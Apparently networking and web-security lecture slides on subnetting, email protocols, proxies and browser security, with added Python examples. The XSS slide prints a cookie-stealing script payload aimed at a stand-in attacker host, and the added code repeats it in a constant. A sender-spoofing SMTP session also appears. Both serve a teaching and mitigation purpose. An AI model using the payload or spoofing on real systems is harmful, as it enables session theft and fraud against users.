We don't know what technique will be adopted by the IETF to overcome the problems of address depletion. However, according to them, whatever happens, the changes should not have any near-term effect on your hosts, and IP addressing will stay the same at least for some time.
Why subnetting?
• Preservation of address space
• Control network traffic, avoid collisions
• Reduce the routing complexity
• Improve network performance
• Security
Subnetting
Subnetting is a method for getting the most out of the limited 32-bit IP addressing space. With any address class, subnetting provides a means of allocating a part of the host address space to network addresses, which will let you have more networks. The part of the host address space allocated to new network addresses is known as the subnet number.
The InterNIC assigned the University of Windsor one class B network address, 137.207.0.0, with network number part 137.207. The host number part is left to be assigned by local management (Computing Services).
Subnetting
• In a class B IP address, the 2 right-hand bytes assigned for the host number can be subdivided into 254 subnetworks and 254 hosts for each subnetwork number.
• Which bits in the host address bytes will be applied to subnet addresses and which to host addresses is determined by a subnet mask, or netmask (/etc/netmasks).
• The netmask can be applied to an IP address using the bitwise logical AND operator.
• If a netmask 255.255.255.0 (or FF.FF.FF.00) is applied to the address 137.207.192.003 (or 89 CF C0 03), the result is a network number 137.207.192.0, i.e.:
137.207.192.003 & 255.255.255.000 = 137.207.192.000
or, 89 CF C0 03 & FF FF FF 00 = 89 CF C0 00.
Now the system (router or server) will look for a network number of 137.207.192.000 instead of a network number of 137.207; the router (or the server) will then locate the host (workstation) in its table and add the corresponding machine number to get 137.207.192.003. To increase the host number beyond 254, a different mask could be used, giving fewer subnetworks and more hosts.
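The netmask AND and the subnet/host trade-off from the subnetting slides, as an added example that is not code from the lecture. It reproduces 137.207.192.3 & 255.255.255.0 = 137.207.192.0 in both the dotted and the hex spelling the slides use, and counts usable subnets and hosts per subnet with the same "2^n - 2" convention as the slides (254 subnets of 254 hosts for a class B network under a 255.255.255.0 mask). The second mask, 255.255.254.0, is a constructed instance of the slide's last sentence: fewer subnetworks, more hosts. The mask check rejects a mask whose one-bits are not contiguous, a common misconfiguration.

```python
"""Applying a netmask with bitwise AND and counting subnets/hosts.

Added illustration for the subnetting slides; not code from the lecture.
Reproduces 137.207.192.3 & 255.255.255.0 = 137.207.192.0 and the "2^n - 2"
counting convention the slides use (all-zeros and all-ones excluded).
"""


def dotted_to_int(text: str) -> int:
    value = 0
    for part in text.split("."):
        n = int(part)
        if not 0 <= n <= 255:
            raise ValueError("octet out of range")
        value = (value << 8) | n
    return value


def int_to_dotted(value: int) -> str:
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def apply_netmask(address: str, netmask: str) -> str:
    """Network number = address AND netmask."""
    return int_to_dotted(dotted_to_int(address) & dotted_to_int(netmask))


def hex_form(address: str) -> str:
    """The slides' hex spelling, e.g. 137.207.192.3 -> '89 CF C0 03'."""
    return " ".join(f"{int(p):02X}" for p in address.split("."))


def subnet_plan(network_bits: int, netmask: str):
    """For a classful network with `network_bits` fixed bits (16 for class B),
    return (usable subnets, usable hosts per subnet) under `netmask`."""
    mask = dotted_to_int(netmask)
    mask_bits = bin(mask).count("1")
    # A valid mask is a run of ones followed by a run of zeros.
    if mask != (0xFFFFFFFF << (32 - mask_bits)) & 0xFFFFFFFF:
        raise ValueError("netmask bits are not contiguous")
    subnet_bits = mask_bits - network_bits
    host_bits = 32 - mask_bits
    return 2 ** subnet_bits - 2, 2 ** host_bits - 2


if __name__ == "__main__":
    addr, mask = "137.207.192.3", "255.255.255.0"
    print(addr, "&", mask, "=", apply_netmask(addr, mask))
    print(hex_form(addr), "&", hex_form(mask), "=", hex_form(apply_netmask(addr, mask)))
    print("class B, mask 255.255.255.0 ->", subnet_plan(16, "255.255.255.0"))
    print("class B, mask 255.255.254.0 ->", subnet_plan(16, "255.255.254.0"))
```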
• TCP/IP
• Addressing Schemes
• Every computer and network on the Internet uses the same protocols
(rules and procedures) to control timing and data format.
• When you use the Internet, your PC (a client) requests data from a host
system. The request and data are broken into packets and travel across
multiple networks before being reassembled at their destination.
• Each IP address has four parts – each part a number between 0 and 255.
An IP address might look like this: 205.46.117.104.
• A domain name identifies the type of institution that owns the computer.
An Internet server owned by IBM might have the domain name ibm.com.
• News
• Telnet
• Electronic mail (e-mail) is the most popular reason people use the
Internet.
• To use e-mail, a user must have an e-mail address, which you create by
adding your user name to the
e-mail server's domain name, as in [email protected].
Example of Telnet (Character mode)
[Figure: image from Dr. Wang’s course at http://www.cse.scu.edu/~mwang2/tcpip/]
Some Common Features of Telnet
Telnet Commands
SSH – Secure Shell
SSH Programs and Usages
26-2 ELECTRONIC MAIL
Note
When the sender and the receiver of an e-mail are on the same system, we need only two user agents.
Note
When the sender and the receiver of an e-mail are on different systems, Wikipedia shows a good example of email operation (next page).
Typical Email Operation (from Wikipedia)
Note
Some examples of command-driven user agents are mail, pine, and elm (under Unix).
Note
Some examples of GUI-based user agents are Eudora, Outlook, and Netscape.
Figure 26.12 Format of an e-mail
• The sender uses a DNS query for the MX record of the domain name in order to find the name and IP of the target email server.
MIME
• User agents make the translation between non-ASCII data and the ASCII email message.
• If you check the source file of an email that has an attachment, you will find the MIME usage.
• This is the main reason why an email with an attachment becomes bigger.
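The translation and the size growth described above, as an added example that is not code from the lecture. It uses Python's standard email package to build a message with a constructed binary attachment, parses the result back as a receiving user agent would, and reports the Content-Transfer-Encoding the user agent chose and the encoded versus original size. Base64 carries 3 bytes in 4 ASCII characters, so the attachment grows by about one third. The addresses use the reserved .invalid domain and are constructed.

```python
"""How a binary attachment is carried in an ASCII e-mail, and why it grows.

Added illustration for the MIME slide; not code from the lecture.
Builds a message with a constructed binary attachment using the standard
library's email package and compares attachment size with its encoded form.
"""
from email import message_from_bytes
from email.message import EmailMessage


def build_message(attachment: bytes, filename: str = "data.bin") -> bytes:
    """Compose a message with one binary attachment and return its wire form."""
    msg = EmailMessage()
    msg["From"] = "alice@example.invalid"   # constructed addresses
    msg["To"] = "bob@example.invalid"
    msg["Subject"] = "report"
    msg.set_content("See attached.")
    # Non-ASCII bytes cannot travel in a 7-bit message body, so the user agent
    # base64-encodes them and records that in Content-Transfer-Encoding.
    msg.add_attachment(attachment, maintype="application",
                       subtype="octet-stream", filename=filename)
    return msg.as_bytes()


def attachment_info(raw: bytes):
    """Parse the message back; return (encoding, encoded size, decoded size)
    for the attachment part, or None if there is no attachment."""
    msg = message_from_bytes(raw)
    for part in msg.walk():
        if part.get_filename():
            encoded = part.get_payload(decode=False)   # the ASCII text on the wire
            decoded = part.get_payload(decode=True)    # the original bytes
            return (part["Content-Transfer-Encoding"],
                    len(encoded.replace("\n", "")), len(decoded))
    return None


def growth_ratio(attachment: bytes) -> float:
    """Encoded-to-original size ratio; base64 gives about 4/3."""
    _, encoded_len, decoded_len = attachment_info(build_message(attachment))
    return encoded_len / decoded_len


if __name__ == "__main__":
    blob = bytes(range(256)) * 12        # 3072 constructed binary bytes
    raw = build_message(blob)
    print(raw.decode("ascii").split("\n\n")[0])   # top-level headers only
    print(attachment_info(raw))
    print(f"growth: {growth_ratio(blob):.3f}")
```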
Table 26.5 Data types and subtypes in MIME
POP3 or IMAP4
Table 26.7 Commands
Table 26.8 Responses
Table 26.8 Responses (continued)
Example 26.3
Through this process, you can see why you cannot trust the “sender” or any part of a received email, and why email spam is so easy to generate.
Sample email sending using telnet
“telnet longwood.cs.ucf.edu 25”
C: HELO fake.domain
S: 250 Hello crepes.fr, pleased to meet you
C: MAIL FROM: <[email protected]>
S: 250 [email protected]... Sender ok
C: RCPT TO: <[email protected]>
S: 250 [email protected] ... Recipient ok
C: DATA
S: 354 Enter mail, end with "." on a line by itself
C: from: "fake man" <[email protected]>
C: to: "dr. who" <who@who>
C: subject: who am I?
C: Do you like ketchup?
C: How about pickles?
C: .
S: 250 Message accepted for delivery
C: QUIT
S: 221 longwood.cs.ucf.edu closing connection
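The session above shows three sender fields the client chose freely: the HELO name (fake.domain, while the server saw crepes.fr), the envelope MAIL FROM, and the From: header inside DATA. A receiving mail filter flags exactly those inconsistencies. The following added example, not code from the lecture, parses a constructed transcript in the same C:/S: shape (the addresses on the slide are redacted, so made-up ones under the reserved .invalid domain are used) and lists the mismatches.

```python
"""Checking a received SMTP session for the sender inconsistencies the slide
points out: the greeting name, the envelope sender and the header From: can
all be chosen freely by the client, so a receiver compares them.

Added illustration, not code from the lecture. The transcript is a constructed
sample in the shape of the slide's telnet session; addresses are made up.
"""
import re

SAMPLE_SESSION = """\
C: HELO fake.domain
S: 250 Hello crepes.fr, pleased to meet you
C: MAIL FROM: <fake@fake.domain>
S: 250 fake@fake.domain... Sender ok
C: RCPT TO: <who@example.invalid>
S: 250 who@example.invalid ... Recipient ok
C: DATA
S: 354 Enter mail, end with "." on a line by itself
C: from: "fake man" <boss@example.invalid>
C: to: "dr. who" <who@example.invalid>
C: subject: who am I?
C: Do you like ketchup?
C: .
S: 250 Message accepted for delivery
"""


def parse_session(text: str) -> dict:
    """Pull out the claimed HELO name, the name the server observed, the envelope
    MAIL FROM address and the header From: address from the DATA section."""
    info = {"helo": None, "server_saw": None, "mail_from": None, "header_from": None}
    in_data = False
    for line in text.splitlines():
        who, _, body = line.partition(": ")
        if who == "S":
            m = re.match(r"250 Hello (\S+),", body)
            if m:
                info["server_saw"] = m.group(1)
        elif who == "C":
            if in_data:
                if body == ".":
                    in_data = False
                else:
                    m = re.match(r"from:.*<([^>]+)>", body, re.I)
                    if m:
                        info["header_from"] = m.group(1)
            elif re.match(r"HELO (\S+)", body, re.I):
                info["helo"] = re.match(r"HELO (\S+)", body, re.I).group(1)
            elif re.match(r"MAIL FROM:\s*<([^>]+)>", body, re.I):
                info["mail_from"] = re.match(r"MAIL FROM:\s*<([^>]+)>", body, re.I).group(1)
            elif body.upper() == "DATA":
                in_data = True
    return info


def sender_mismatches(info: dict) -> list:
    """Name every inconsistency a mail filter would flag for this session."""
    findings = []
    if info["helo"] and info["server_saw"] and info["helo"] != info["server_saw"]:
        findings.append(f"HELO name {info['helo']} != observed host {info['server_saw']}")
    env_dom = (info["mail_from"] or "").rpartition("@")[2]
    hdr_dom = (info["header_from"] or "").rpartition("@")[2]
    if env_dom and hdr_dom and env_dom != hdr_dom:
        findings.append(f"envelope domain {env_dom} != header From domain {hdr_dom}")
    return findings


if __name__ == "__main__":
    for finding in sender_mismatches(parse_session(SAMPLE_SESSION)):
        print("flag:", finding)
```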
• Do not try to use telnet on department email server except for the homework!
• Do not try to use it to spam your friends without upfront notice!
Figure 26.19 POP3 (Post Office Protocol) and IMAP4 (Internet Mail Access Protocol)
Figure 26.20 The exchange of commands and responses in POP3
POP3 protocol (tcp: 110)
authorization phase
• client commands:
– user: declare username
– pass: password
• server responses
– +OK
– -ERR
transaction phase, client:
• list: list message numbers
• retr: retrieve message by number
• dele: delete
• quit
Telnet example
S: +OK POP3 server ready
C: user bob
S: +OK
C: pass hungry
S: +OK user successfully logged on
C: list
S: 1 498 (length in bytes)
S: 2 912
S: .
C: retr 1
S: <message 1 contents>
S: .
C: dele 1
C: retr 2
S: <message 2 contents>
S: .
C: dele 2
C: quit
S: +OK POP3 server signing off
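The exchange above, run against a toy server, as an added example that is not part of the slides: an in-memory POP3 server handles the authorization and transaction phases, and the client-side parser handles single-line and multi-line responses. The mailbox contents and the bob/hungry credentials are constructed; the +OK/-ERR status words, the command names, the lone "." terminator and the leading-dot stuffing rule are POP3's own (RFC 1939).

```python
"""Added example (not from the slides): minimal POP3 server and client-side
response parsing, driven with the command sequence shown on the slide."""

# Constructed mailbox: two messages; the second contains a line starting with "."
SAMPLE_MAILBOX = [
    "Subject: lunch\n\nDo you like ketchup?",
    "Subject: re: lunch\n\n.hidden line\nHow about pickles?",
]


def dot_stuff(body: str) -> list:
    """A body line that begins with '.' is sent as '..' so the client does not
    mistake it for the end-of-response terminator."""
    return ["." + line if line.startswith(".") else line
            for line in body.splitlines()]


def parse_response(text: str) -> tuple:
    """Split a raw response into (ok, status line, body lines).  A multi-line
    body ends at a lone '.', and a leading '..' is unstuffed back to '.'."""
    lines = text.split("\n")
    status = lines[0]
    body = []
    for line in lines[1:]:
        if line == ".":
            break
        body.append(line[1:] if line.startswith("..") else line)
    return status.startswith("+OK"), status, body


class FakePop3Server:
    """Authorization and transaction phases for one mailbox.  As in real POP3,
    DELE only marks a message; deletions are applied when QUIT arrives."""

    def __init__(self, user: str, password: str, messages: list):
        self.user, self.password = user, password
        self.messages = list(messages)
        self.state = "authorization"
        self.pending_user = None
        self.deleted = set()

    def greeting(self) -> str:
        return "+OK POP3 server ready"

    def _number(self, arg: str):
        """Return a valid, undeleted message number, or None."""
        if not arg.isdigit():
            return None
        n = int(arg)
        return n if 1 <= n <= len(self.messages) and n not in self.deleted else None

    def handle(self, line: str) -> str:
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.lower()
        if self.state == "authorization":
            if cmd == "user":
                self.pending_user = arg
                return "+OK"
            if cmd == "pass":
                # The password arrives in clear text, which is why plain POP3
                # belongs inside TLS (port 995, or STLS on port 110).
                if self.pending_user == self.user and arg == self.password:
                    self.state = "transaction"
                    return "+OK user successfully logged on"
                return "-ERR invalid password"
            return "-ERR not logged in"
        if cmd == "list":
            entries = [f"{i} {len(m)}" for i, m in enumerate(self.messages, 1)
                       if i not in self.deleted]
            return "\n".join([f"+OK {len(entries)} messages"] + entries + ["."])
        if cmd == "retr":
            n = self._number(arg)
            if n is None:
                return "-ERR no such message"
            return "\n".join(["+OK"] + dot_stuff(self.messages[n - 1]) + ["."])
        if cmd == "dele":
            n = self._number(arg)
            if n is None:
                return "-ERR no such message"
            self.deleted.add(n)
            return "+OK message marked for deletion"
        if cmd == "quit":
            self.messages = [m for i, m in enumerate(self.messages, 1)
                             if i not in self.deleted]
            self.deleted.clear()
            self.state = "update"
            return "+OK POP3 server signing off"
        return "-ERR unknown command"


def run_session(server: FakePop3Server, commands: list) -> list:
    """Send each command in turn and return the parsed (ok, status, body) replies."""
    return [parse_response(server.handle(c)) for c in commands]


if __name__ == "__main__":
    srv = FakePop3Server("bob", "hungry", SAMPLE_MAILBOX)
    print("S:", srv.greeting())
    script = ["user bob", "pass hungry", "list", "retr 2", "dele 1", "quit"]
    for cmd, (ok, status, body) in zip(script, run_session(srv, script)):
        print("C:", cmd)
        print("S:", status, body)
```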
Web-based Email
• Email clients use the web browser for all interactions
• A user can access his/her email anywhere, via any computer that has Internet
access
• Email provider may provide more functions
• Gmail has very good search capability
• Gmail has the message grouping function
• Many provide bundled services with their other products
• Voice/video, photo sharing, …
26-3 FILE TRANSFER
Note
FTP uses the services of TCP. It needs two TCP connections.
The well-known port 21 is used for the control connection and the well-known port
20 for the data connection.
Example 26.4 (continued)
Example 26.5
Example 26.5 (continued)
Dying of FTP
Hypothetical Example (S: security, P: privacy, A: anonymity; ! means the property is lost)
• A video file (VF) resides in your computer.
• Assume the computer is always offline, is immune to
digital forensics, and can only be accessed by you.
– VF: S, P, A
• You allow others to use your computer.
– VF: !S, !P, !A
• You encrypt the file (homebrew)
– VF: S, !P, !A
• You implement user control, so others cannot access the file
– VF: S, P, !A
• You hide the file from other users
– VF: S, P, A
The Problem
• Networks greatly complicate security, privacy, and
anonymity
• A known (not anonymous) file breaches privacy
and risks security
• A non-private file breaches anonymity and risks
security
• An insecure file risks privacy and anonymity
• Uploading that video file from the previous
example to a website like YouTube throws
anonymity right out the window
Private Browsing
• Unlike normal browsing, no information is stored locally about
you
• Private sessions are “sandboxed” from normal sessions
• Plugins may or may not be private
• Still vulnerable to:
– Search engines
– Websites that collect/share info about you (read: most
websites)
– Malware
– Internet Service Provider (ISP) surveillance
– Physical surveillance
Private Browsing++
• NoScript: Control exactly what scripts (plugins)
run on your computer
• AdBlock Plus: Keep ads and adware from
executing on your computer
• Abine’s Blur: Anti-trackers, autogenerated proxy
email addresses, passwords, and credit card
numbers
• ShodanHQ and ScamAdvisor.com: Check where a
website is and if it is legitimate.
• CCleaner and others: Customizable local data
management
Mobile Anonymity
• Anonymity does not automatically transfer to mobile devices!
• You have to manually configure everything again…
• Browsers: DuckDuckGo (or configure other browsers)
• Proxy: Orbot
• VPN: OpenVPN
• Root/Jailbreak for full control!
Client Proxy
Figure: clients – proxy – Internet; functions placed on the proxy: Byte Caching, Logging, Authentication, Protocol detection, BW management, Policy, Caching, Antivirus, Protocol optimization, Compression, URL-Filtering
Application proxy
Figure: an application proxy between clients and the Internet, with one handler per protocol: Streaming, HTTP & HTTPS, FTP, MAPI, CIFS, P2P, Telnet/Shell, DNS, TCP-Tunnel, SOCKS, AOL-IM, Yahoo-IM, MSN-IM, and unclassified traffic (.mp3, .xxx, gral.se, ?)
How We Secure the Web
Figure: intranet web server and public web server; internal network with clients on one side, public Internet on the other, the proxy between them
Content Filtering
• Organizations need to control what users are doing when accessing the
Internet, to protect against legal liability and productivity risks
• Blue Coat and our partners enable
enterprise-class content filtering
– Powerful granular user control using
Blue Coat’s Policy Processing Engine
• By user, group, destination IP and/or URL,
time of day, site, category, lots more
– Multiple logging and reporting options
– Integrates with all authentication
(LDAP, RADIUS, NTLM, AD, 2-factor, etc.)
– Coaching, warnings, etc.
– High performance with integrated caching
– Drop-in appliance, easy to deploy and manage
– De-facto industry content filtering platform
Content filtering databases
Figure: clients – proxy consulting content filtering databases – Internet
HTTP Compression
ProxySG can support a mixed mode of HTTP compression operation
The Original Content Server (OCS) or core ProxySG can send either compressed or uncompressed content to an edge or
core ProxySG using the GZIP or Deflate algorithms
Figure: Internet – core ProxySG at HQ office – edge ProxySG at remote office; each link is labelled compressed or uncompressed, showing that compression can be applied on any hop independently
BENEFITS
Protect performance of mission critical applications
• SAP, ERP apps
Prevent bandwidth greedy applications from impacting other applications
• P2P
Provision bandwidth for applications that require a per-session amount of
bandwidth
• Streaming
Balance necessary and important, bandwidth intensive, applications
• HTTP, IM
How We Secure the Web
Figure: intranet web server, public web server, internal network and public Internet, with the proxy's functions called out:
AAA: User logs onto network and is authenticated via NTLM, AD (Single-Sign-on), LDAP, Radius, Forms, local password.
Policy Processing Engine: All user web application requests are subjected to granular security policy.
Content Filtering: Requests for content are controlled using content filtering based on granular policy.
Bandwidth management: Compression, Bandwidth management and Streaming media Caching and Splitting.
Web Virus scanning: Potentially harmful content entering the network via HTTP, HTTPS and FTP is stripped or scanned by ProxyAV.
Virus, Code & Script scanning
Figure: clients – ProxySG – Internet, with ProxySG handing content to ProxyAV (Sophos, McAfee, Kaspersky, Panda engines) and to other ICAP servers for scanning
ProxyAV
ProxySG & ProxyAV
- Large Enterprise/Network Core
- Scan once, serve many (cache benefit)
• Streaming
– Microsoft Streaming & Native RTSP
– Live Stream split, VOD Stream cache
– Rich Streaming features, Unicast-Multicast
– Scheduling live streaming from VOD
• Enhancements
– Store, Cache & distribute Video On Demand
– Schedule VOD content to be played as Live Content
– Convert between Multicast-Unicast
– Authenticate Streaming users to NTLM, LDAP, RADIUS + on-box
How We Secure the Web
Figure: intranet web server, public web server, internal network and public Internet, with Reporter collecting the proxy's logs
The Internet
The Internet today consists of 350 million web servers.
Generation 1
The first generation of content filters consisted of
static, manually managed lists of popular pornographic
and unproductive websites. Very often retrieved from
access logs, popular bad sites were banned.
Generation 2
Corporations realised they could make money off a list
and started to collect lists and logs from the web, manually
rating these at larger scale. More categories were added
to increase value. The systems started to collect URLs
automatically and download new lists periodically, some
of them even many times every day.
Figure: list sizes of 1 million (generation 1) and 15 million URLs (generation 2) against 335 million web servers
Generation 2
The number of URLs was in the range of 10-20 million.
Hit rates presented in log systems were in the range of
50-80%. Regular expressions on URLs and other tricks
sometimes gave a false picture of a rating rate over 90%. But in
fact less than 5% of the Internet was covered.
Figure: 15 million rated URLs against 335 million web servers
Generation 3
The dynamics of the Internet and new security risks urged for
a new way of categorizing the Internet. Dynamic rating of
uncategorized websites can today rate most websites; the
ones that are impossible to rate can be stripped down to
present only HTML and images to reduce risk.
Figure: 15 million statically rated URLs against 335 million web servers
Figure: dynamic rating pipeline: clients – proxy – Internet servers; uncategorized requests go to the rating service (RS) and to language detection (language 1 … language n, 44µs), then to background rating; the labels G2, DBR, HR and DRTR mark the rating stages
SSL Proxy
Figure: user – apps – SSL policy – SSL – Internet / internal network
Blue Coat: Visibility and Context
Figure: Client-Proxy Connection and Server-Proxy Connection (Client – Proxy – Server)
Flexible Configurations – Option 1
• Trusted applications passed through
– Sensitive, known, financial or health care
• No cache, visibility
• Awareness of network-level information only
Figure: user – apps – SSL – Internet; the proxy sits on the TCP connection only (TCP – Control – TCP), the SSL session passes through untouched
Flexible Configurations – Option 2
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic passed through after initial checks
• No cache
• Visibility and context of network-level info, certificates,
user, and applications
• Can warn user, remind of AUP, and offer opt-out
Figure: user – apps – SSL – Internet; the proxy inspects the handshake (Control) on the TCP connection, then the SSL session passes through
Flexible Configurations – Option 3
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic proxied after initial checks
• Full caching and logging options
• Visibility and context of network-level info,
certificates, user, applications, content, etc.
– Full termination/proxy
• Can warn user, remind of AUP, and offer opt-out
Figure: user – apps – SSL – proxy – SSL – Internet; two separate SSL sessions over two TCP connections, with Control in the middle
Reverse Proxy
Figure: clients on the Internet – reverse proxy – servers; functions placed on the proxy: Policy, Logging, Authentication, URL-rewrite, AV, SSL/Certificate, Caching
Reverse Proxy
PROTECTS Web Servers
• Secure, object-based OS
• Controls access to web apps
• Web AV scanning
ACCELERATES Web Content
• Intelligent caching
• Compression and bandwidth mgt.
• TCP & SSL offload
SIMPLIFIES Operations
• Scalable, optimized appliance
• Easy policy creation & management
• Complete logging & reporting
Figure: users on the public Internet – firewall – ProxySG – web servers on the internal network
HTTPS Termination
• HTTPS Termination (Client ProxySG)
– Off-load secure website or portal
• HTTPS Origination (ProxySG Server)
– Secure channel to content server for clients
• Man-in-the-Middle (Termination & Origination)
– Allows caching, policy and virus scanning
• Secure credential acquisitions
• SSL Hardware Acceleration Cards
– 800 RSA transactions per second per card
– SSL v2.0, v3.0, and TLS v1 support
• Off-load web application servers to improve performance
Example Scenarios for Reverse Proxy
• Secure and Accelerate Public Websites
– Improves content delivery with integrated caching
– Services legitimate users while resisting DoS attacks
– High-performance SSL
• Secure Corporate Webmail
– Securely isolates Web servers from direct Internet access
– Proxy authentication for additional layer of protection
– Plug-n-play SSL
• Scanning Uploaded Files for Viruses
– Simple integration with ProxyAV™
– Real-time scanning of uploaded content
– Protects Web infrastructure from malware
Recipe for Branch Performance Problems
Server Consolidation + Increased application traffic
• Enterprise users becoming more distributed
– Mobile, teleworker, and branch/remote offices
– Regulatory and cost drivers
• Remote employee training becoming a necessity
– Live (streaming) and on-demand video
• Performance quality becoming a requirement
– Network and application issues must be addressed
– Control and acceleration of video is needed
Bandwidth Management
Figure: two bandwidth classes: Sales Automation App – Priority 1, Min 400Kb, Max 800Kb; E-Mail – Priority 2, Min 100Kb, Max 400Kb
Protocol Optimization
10-100X Faster
Includes CIFS, MAPI, HTTP, HTTPS, TCP
Object Caching
• Built on high-level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Advantages
– Fastest response times
– Offload work from servers (and networks)
– Can be deployed asymmetrically
• Limitations
– Application-specific
– All or nothing: No benefit if whole object not found or changed
Byte Caching
Figure: Local History Cache and Remote History Cache holding the same bit sequences. Proxies keep a history of all bytes sent and received. Sequences found in the local history cache are transmitted as small references (e.g. [R1]0010010[R2]100101111100 … [R3]) over the WAN; the original stream is reconstructed using the remote history cache.
Compression
Figure: the same bit stream on both sides; in between, COMPRESSION reduces the transmitted stream to a shorter form that the remote side expands again
Object Caching
• Object caches are built on higher level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Object cache advantages
– Fastest response times
– Offload work from servers
– Can be deployed asymmetrically
• Object cache disadvantages
– Works with limited set of applications
– Works on limited range of data inside applications
– All or nothing: No benefit if whole object not found or changed
Object vs. Byte Caching
                      Object caching   Byte caching
Server Offload        X
Network Offload       X                X
Incremental Updates                    X
No App Integration                     X
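The byte caching figure and the comparison with object caching above can be demonstrated with a few dozen lines. The following is an added example, not code from the slides or from any product: both ends keep the same history of chunks, the sender replaces any chunk already in the history with a short reference, and the receiver rebuilds the original stream from its own copy of the history. A second transfer of a slightly edited file then sends only the changed chunk in full, which is the "incremental updates" row of the table. The chunk size, the token format, the 4-byte reference cost and the sample records are this example's own choices; it uses fixed-size chunks for readability, whereas real byte caches use content-defined chunk boundaries found with a rolling hash.

```python
"""Added example (not from the slides): a minimal byte cache with a shared
history on both ends.  Fixed-size chunks are an explicit simplification."""
import hashlib

CHUNK = 32  # bytes per history entry (small so the example stays readable)


class ByteCache:
    def __init__(self):
        self.index = {}      # chunk digest -> reference number
        self.history = []    # reference number -> chunk bytes

    def _remember(self, chunk: bytes) -> int:
        """Add a chunk to the history (once) and return its reference number.
        Both ends call this in the same order, so the numbers agree."""
        d = hashlib.sha256(chunk).digest()
        if d not in self.index:
            self.index[d] = len(self.history)
            self.history.append(chunk)
        return self.index[d]

    def encode(self, data: bytes) -> list:
        """Sender side.  Tokens are ('R', n) for a chunk already in the history
        or ('L', chunk) for a literal that has to cross the WAN."""
        tokens = []
        for i in range(0, len(data), CHUNK):
            chunk = data[i:i + CHUNK]
            d = hashlib.sha256(chunk).digest()
            if d in self.index:
                tokens.append(("R", self.index[d]))
            else:
                tokens.append(("L", chunk))
            self._remember(chunk)
        return tokens

    def decode(self, tokens: list) -> bytes:
        """Receiver side.  Resolve references against the local history and add
        literals to it so the two histories stay identical."""
        out = bytearray()
        for kind, value in tokens:
            chunk = self.history[value] if kind == "R" else value
            self._remember(chunk)
            out += chunk
        return bytes(out)


def wan_bytes(tokens: list) -> int:
    """Approximate bytes on the wire: literals in full, 4 bytes per reference."""
    return sum(len(v) if k == "L" else 4 for k, v in tokens)


def transfer(sender: ByteCache, receiver: ByteCache, data: bytes) -> tuple:
    """Send data through both caches; return (reconstructed bytes, wire bytes)."""
    tokens = sender.encode(data)
    return receiver.decode(tokens), wan_bytes(tokens)


def sample_stream(changed_record: int = -1) -> bytes:
    """Constructed 3200-byte file of 100 distinct 32-byte records.  One record
    can be altered to mimic a small edit between two transfers."""
    records = []
    for i in range(100):
        fill = b"y" if i == changed_record else b"x"
        records.append(f"record {i:04d} ".encode() + fill * 19 + b"\n")
    return b"".join(records)


if __name__ == "__main__":
    sender, receiver = ByteCache(), ByteCache()
    v1, v2 = sample_stream(), sample_stream(changed_record=50)
    for label, data in (("first send", v1), ("edited file", v2), ("resend", v2)):
        rebuilt, sent = transfer(sender, receiver, data)
        print(f"{label:>12}: {len(data)} bytes in, {sent} on the wire, ok={rebuilt == data}")
```

The limitation in the last paragraph of the "Object Caching" slide does not apply here: the edited file is not an all-or-nothing miss, only the changed chunk is resent. The flip side of the fixed-size simplification is that inserting or deleting a single byte shifts every later chunk boundary and would make this toy resend the whole file, which is exactly the problem content-defined chunking solves.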
Products
MACH5 ships with Blue Coat SGOS 5
Figure: product line by deployment and performance: 400-E Series and SG400 Series for remote offices (up to 250 connected users); 2000-E Series and SG800 Series for corporate headquarters (100-2000 users); SG8000 Series for headquarters (1000-50,000+ users)
400-E1
• One Model: 400-E1
• RAM: 512 MB
• CPU: 1.26GHz PIII
• Disk drive 40 GB IDE
• Network Interfaces (2 on board) 10/100
Base-T Ethernet
• 19" Rack-mountable
Software
Reporter (SW)
Advanced Java application to generate statistics from logs
Licensed products
Streaming
Real Networks, Microsoft, Quicktime
Instant Messaging
MSN, Yahoo, AOL
Optional Security (HW+SW bundle)
SSL termination/proxy
Licensed products
Content filtering
BlueCoat Webfilter
ICAP AV Scanner
ProxyAV (McAfee, Sophos, Panda, Kaspersky, Ahn Labs)
Management
• User Interface
– HTTP (HTTPS), web GUI Interface
– Telnet (Cisco CLI)
– SSH & Serial console
– Java Policy interface
– CPL, Policy Language
– SNMP MIBII + Traps
– Monitor network status and statistics
• Reporting tools
– BlueCoat Reporter
• Scalable management
– Centralized configuration management in Director
Reporting (example)
Figure: report screenshot from production systems
Content Delivery Network
Figure: content owners – WWW servers – Director – edge systems – users
1 Publish content
2 Tell Director about new content
3 Tell caches to update content
4 Pull content from origin servers
5 Deliver the content
GUI
History
• First ever browser – WorldWideWeb
(1990)
o Created at CERN by Tim Berners-Lee
o Used internally, no real security threats
o Would only display HTML text
o Allowed downloading of other file types
History
• Mosaic (1993)
o First browser with a GUI
o Led to an increase in Internet popularity
• Netscape Navigator (1994)
o Nearly disappeared by 2000
• Internet Explorer (1995)
o Held as much as 95% of the market
History
• Safari (2003)
o Apple’s browser
• Firefox (2004)
o Open source
• Chrome (2008)
o Rapid increase in market share
Security Issues
Cross Site Scripting (XSS)
o Takes advantage of complex, dynamic web pages
o Injects client side scripts, HTML
o Can lead to cookie theft, browser redirection, untrusted content
o Nearly 80% of vulnerabilities in 2007 (Symantec)
Security Issues
Example
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie</script>
source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting
• XSS Mitigation
o Disable scripting
o Sanitize input, escape HTML/scripts
o No script access to cookies
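The two server-side mitigations in the list, output escaping and keeping scripts away from the session cookie, can be shown on the example URL above. The following is an added example, not code from the slides or the cited source: it extracts the `username` parameter from that URL, renders it once the vulnerable way (raw interpolation) and once escaped with Python's standard `html.escape`, and builds the `Set-Cookie` header that denies `document.cookie` access to the session id. The page template, function names and cookie attributes other than `HttpOnly` are this example's own choices.

```python
"""Added example (not from the slides): vulnerable vs. hardened rendering of a
reflected parameter, plus an HttpOnly session cookie."""
import html
from urllib.parse import parse_qs, urlsplit

# The attack URL from the slide (portal.example / attackerhost.example are the
# slide's own example host names).
SLIDE_URL = ("http://portal.example/index.php?sessionid=12312312&"
             "username=<script>document.location='http://attackerhost.example/"
             "cgi-bin/cookiesteal.cgi?'+document.cookie</script>")


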